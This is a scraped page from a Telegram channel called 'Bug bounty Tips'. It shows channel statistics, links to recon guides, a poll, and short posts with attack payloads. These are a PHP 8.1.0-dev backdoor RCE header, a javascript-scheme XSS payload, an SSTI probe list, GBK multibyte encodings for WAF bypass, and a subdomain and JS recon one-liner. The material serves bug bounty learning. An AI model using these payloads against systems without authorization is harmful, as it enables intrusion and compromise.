Bug bounty Tips

Open in Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

India57 104 Technologies & Applications17 298

5 860

Subscribers

+624 hours

+707 days

+36030 days

491

Post views

~ 28724 hours

~ 41348 hours

8.39%

Engagement rate

~ 3

Posts per day

Ads index

beta

Posts Archive

5 860

From 0 to 726 views per week. starting is a best and beautiful option u do and thanks to u guys also

5 860

https://book.cipherops.tech/bug-bounty-notes/recon-tips/best-recon-technique-for-active-subdomain-enumeration

5 860

u guys can join and explain me here https://t.me/bug_hunting_talks, we can talk i need your suggestions its an humble request

5 860

Guys, i want your response, planning to start a bugbounty live classes training. for 2 months and 2 months internships for 20k is it going to work or not.

5 860

https://x.com/noexceptcpp/status/1700600383679111333?s=20

5 860

https://book.cipherops.tech/bug-bounty-notes/twitter/thread-by-archangeldday-on-thread-reader-app/tips-and-tricks-from-twitter

5 860

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

5 860

Bug Bounty Tip When the app only accepts URLs with a specific scheme, try injecting javascript://test.com Then, use these symbols to craft an XSS payload 🔹%0a 🔹%0d 🔹%E2%80%A8 🔹%E2%80%A9 ✅ javascript://test.com%0aalert(1)

5 860

Bug Bounty Tip SSTI (Server Side Template Injection) Payload List 🔹{7*7} 🔹*{7*7} 🔹{{7*7}} 🔹[[7*7]] 🔹${7*7} 🔹@(7*7) 🔹 🔹<%= 7*7 %> 🔹${= 7*7} 🔹{{= 7*7}} 🔹${{7*7}} 🔹#{7*7} 🔹[=7*7] If evaluated as 49 - the target is vulnerable Cheers!

5 860

"🤖 Scan this QR code if you want to know what's cookin' at CipherOps! 🍳🕵️‍♂️ Unravel the mysteries of cyberworld at cipherops.tech. It's like a secret menu for techies! 🌐🔓 #CipherOps #TechMystery #QRAdventure"

5 860

https://book.cipherops.tech/bug-bounty-notes/web-application/exploring-xpath-injection-basics-techniques-and-creative-exploitation

5 860

Do you think web developers should prioritize security against XSS vulnerabilities in their projects?

Anonymous voting

5 860

Bug Bounty Tip GBK Encoding / MultiByte Attack 嘊 = %E5%98%8A = \u560a ⇒ %0A 嘍 = %E5%98%8D = \u560d ⇒ %0D 嘾 = %E5%98%BE = \u563e ⇒ %3E (>) 嘼 = %E5%98%BC = \u563c ⇒ %3C (<) 嘢 = %E5%98%A2 = \u5622 ⇒ %22 (') 嘧 = %E5%98%A7 = \u5627 ⇒ %27 (") For XSS, CRLF, WAF bypass

5 860

I am looking for a contributors any one intrested can contribute on github [https://github.com/Adwaithsheety/Cipherops]

5 860

https://book.cipherops.tech/bug-bounty-notes/web-application/comprehensive-guide-to-web-content-discovery-tools-techniques-and-tips

5 860

https://book.cipherops.tech/bug-bounty-notes/web-application/mastering-subdomain-takeovers

5 860

To extract JavaScript files using a one-liner with the following tools: haktrails, httpx, getjs, anew, and tojson, you can use the following command: haktrails -d example.com | httpx -silent | getjs -c 200 - | anew -q jsfiles.txt | tojson Here's what this one-liner does step by step: haktrails -d example.com: Uses haktrails to discover subdomains of example.com. httpx -silent: Uses httpx to fetch the live subdomains and websites associated with example.com. getjs -c 200 -: Uses getjs to extract JavaScript files from the discovered websites. The -c 200 flag specifies a concurrency level of 200 for faster scanning, and the hyphen (-) reads input from the previous command. anew -q jsfiles.txt: Uses anew to filter out duplicate JavaScript file URLs and stores them in a file called jsfiles.txt. tojson: Converts the list of JavaScript URLs into JSON format.